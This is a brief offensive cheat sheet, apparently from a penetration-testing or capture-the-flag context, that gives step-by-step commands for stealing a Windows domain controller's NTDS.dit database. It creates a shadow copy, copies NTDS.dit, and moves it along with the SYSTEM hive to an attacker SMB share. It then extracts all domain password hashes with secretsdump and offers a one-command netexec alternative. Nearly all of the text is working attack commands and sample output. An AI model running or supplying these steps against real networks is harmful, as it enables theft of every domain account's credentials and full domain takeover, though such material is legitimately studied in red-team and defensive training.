Attacking NTDS.dit

1️⃣ Create VSS Shadow Copy of C:

vssadmin CREATE SHADOW /For=C:

Output will give:

Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

---

2️⃣ Copy NTDS.dit from Shadow Copy

cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit

⚠️ NTDS.dit alone is NOT enough. You MUST also download:

SYSTEM hive (bootKey)

---

3️⃣ Transfer NTDS.dit to Attack Machine

SMB share already created? Use:

cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.X.X\CompData

SYSTEM file bhi move karna zaroori:

cmd.exe /c move C:\Windows\System32\config\SYSTEM \\10.10.X.X\CompData

---

4️⃣ Extract Hashes with Secretsdump

impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL

Example Output:

Administrator:500:LM:NT:::
Guest:501:LM:NT:::
krbtgt:502:LM:NT:::
user1:1104:LM:NT:::

This file = DOMAIN PWNED.

---

⚡ FASTEST METHOD – NetExec (Recommended)

One command to: ✔ create VSS ✔ dump NTDS ✔ download dump ✔ auto-extract hashes

netexec smb <DC-IP> -u <user> -p <pass> -M ntdsutil

You will see:

[+] NTDS.dit dumped
[+] Hashes extracted